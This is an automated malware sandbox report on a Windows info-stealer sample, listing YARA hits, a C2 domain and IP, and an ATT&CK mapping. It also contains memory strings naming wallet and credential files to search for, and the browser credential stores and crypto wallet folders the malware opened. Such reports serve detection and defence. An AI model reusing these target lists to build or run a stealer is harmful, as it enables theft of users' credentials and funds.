                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0100E652 GetUserNameW,12_2_0100E652
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FEBCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,12_2_00FEBCD2
                Source: C:\Users\user\Desktop\ChoForgot.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831

                Stealing of Sensitive Information

                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 12.2.Wb.com.3d0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000003.2355126342.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2354948680.0000000001C70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2354981968.0000000004C0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2354920999.0000000004509000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3031023113.0000000004500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3030645181.0000000001C6F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3028437270.00000000003D1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2355154530.0000000004585000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2355096916.0000000001C94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Wb.com PID: 2744, type: MEMORYSTR
                Source: Wb.com, 0000000C.00000002.3028437270.00000000004AD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
                Source: Wb.com, 0000000C.00000002.3028437270.000000000057C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: in\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Wb.com, 0000000C.00000002.3028437270.00000000004AD000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
                Source: Wb.com, 0000000C.00000002.3028437270.00000000004AD000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\key4.db
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\events\key4.db
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\key4.db
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\key4.db
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\key4.db
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\key4.db
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\db\key4.db
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\security_state\key4.db
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\bookmarkbackups\key4.db
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\key4.db
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\key4.db
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\key4.db
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\key4.db
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\to-be-removed\key4.db
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\key4.db
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\key4.db
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\minidumps\key4.db
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\key4.db
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\tmp\key4.db
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\key4.db
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\key4.db
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Exodus\
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Binance\
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                Source: Wb.com Binary or memory string: WIN_81
                Source: Wb.com Binary or memory string: WIN_XP
                Source: Ensures.9.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: Wb.com Binary or memory string: WIN_XPe
                Source: Wb.com Binary or memory string: WIN_VISTA
                Source: Wb.com Binary or memory string: WIN_7
                Source: Wb.com Binary or memory string: WIN_8
                Source: Yara match File source: 0000000C.00000002.3031023113.0000000004500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: Wb.com PID: 2744, type: MEMORYSTR

                Remote Access Functionality

                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                Source: Yara match File source: 12.2.Wb.com.3d0000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0000000C.00000003.2355126342.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000003.2354948680.0000000001C70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000003.2354981968.0000000004C0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000003.2354920999.0000000004509000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000002.3031023113.0000000004500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000002.3030645181.0000000001C6F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000002.3028437270.00000000003D1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000003.2355154530.0000000004585000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000003.2355096916.0000000001C94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: Wb.com PID: 2744, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com Code function: 12_2_01032263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,12_2_01032263
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.com Code function: 12_2_01031C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,12_2_01031C61
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                Credentials | Domains | Default Accounts | 1 Native API | 2 Valid Accounts | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Extra Window Memory Injection | 2 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 21 Input Capture | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 1 DLL Side-Loading | NTDS | 27 System Information Discovery | Distributed Component Object Model | 3 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 Extra Window Memory Injection | LSA Secrets | 1 Query Registry | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 112 Process Injection | 111 Masquerading | Cached Domain Credentials | 221 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Valid Accounts | DCSync | 11 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Virtualization/Sandbox Evasion | Proc Filesystem | 4 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 112 Process Injection | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                Behavior Graph (ID: 1579962; Sample: ChoForgot.exe; Startdate: 23/12/2024; Architecture: WINDOWS; Score: 100)

                Source | Detection | Scanner | Label | Link
                ChoForgot.exe | 11% | ReversingLabs | |
                Source | Detection | Scanner | Label | Link
                C:\Users\user\AppData\Local\Temp\623615\Wb.com | 0% | ReversingLabs | |
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                http://anglebug.com/7761e-data | 0% | Avira URL Cloud | safe |
                https://publickeyservice.gcp.privacysandboxservices.com | 0% | Avira URL Cloud | safe |
                http://anglebug.com/7488/ | 0% | Avira URL Cloud | safe |
                http://anglebug.com/6048- | 0% | Avira URL Cloud | safe |
                http://anglebug.com/7279Q | 0% | Avira URL Cloud | safe |
                https://bijutr.shop936ed13bd870 | 0% | Avira URL Cloud | safe |
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                bijutr.shop | 188.245.216.205 | true | true | | unknown
                chrome.cloudflare-dns.com | 172.64.41.3 | true | false | | high
                t.me | 149.154.167.99 | true | false | | high
                ssl.bingadsedgeextension-prod-europe.azurewebsites.net | 94.245.104.56 | true | false | | high
                sb.scorecardresearch.com | 3.160.188.50 | true | false | | high
                www.google.com | 172.217.21.36 | true | false | | high
                googlehosted.l.googleusercontent.com | 172.217.19.225 | true | false | | high
                assets.msn.com | unknown | unknown | false | | high
                c.msn.com | unknown | unknown | false | | high
                deff.nelreports.net | unknown | unknown | false | | high
                ntp.msn.com | unknown | unknown | false | | high
                clients2.googleusercontent.com | unknown | unknown | false | | high
                bzib.nelreports.net | unknown | unknown | false | | high
                jwpLqUxchOHCiOIbIyqhmtbx.jwpLqUxchOHCiOIbIyqhmtbx | unknown | unknown | false | | unknown
                api.msn.com | unknown | unknown | false | | high
                Name | Malicious | Antivirus Detection | Reputation
                https://c.msn.com/c.gif?rnd=1734970511306&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=07175bb318f0456c974d87721f0f67b4&activityId=07175bb318f0456c974d87721f0f67b4&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=6E60CE8AF10C41EC8044A9E776F1DAF3&MUID=264DEDAF8CF36A9502DCF8F18D816BBC | false | | high
                Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                high
                                                                                                                                                http://www.autoitscript.com/autoit3/XWb.com, 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp, Wb.com.2.dr, Ensures.9.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://chrome.google.com/webstore?hl=en3chrome.exe, 00000011.00000002.2644398640.000047E4010C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://issuetracker.google.com/161903006chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.ecosia.org/newtab/Wb.com, 0000000C.00000002.3031181433.00000000045E3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2642271555.000047E400BBC000.00000004.00000800.00020000.00000000.sdmp, MO8G47.12.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://drive-daily-1.corp.google.com/chrome.exe, 00000011.00000003.2553573276.000047E4004B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://drive-daily-5.corp.google.com/chrome.exe, 00000011.00000003.2553573276.000047E4004B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://duckduckgo.com/favicon.icochrome.exe, 00000011.00000002.2642409748.000047E400C1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionschrome.exe, 00000011.00000002.2644300769.000047E400FF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639529411.000047E40050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640660218.000047E40078C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 00000011.00000002.2644178608.000047E400F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640691773.000047E4007A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639276736.000047E4004C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 00000014.00000003.2700592502.00005B8002464000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700730195.00005B800246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700974412.00005B8002470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://anglebug.com/3078chrome.exe, 00000011.00000002.2640930970.000047E40081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://anglebug.com/7553chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://anglebug.com/5375chrome.exe, 00000011.00000002.2640930970.000047E40081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://bzib.nelreports.net/api/report?cat=bingbusinessReporting and NEL.23.drfalse
                                                                                                                                                                            high
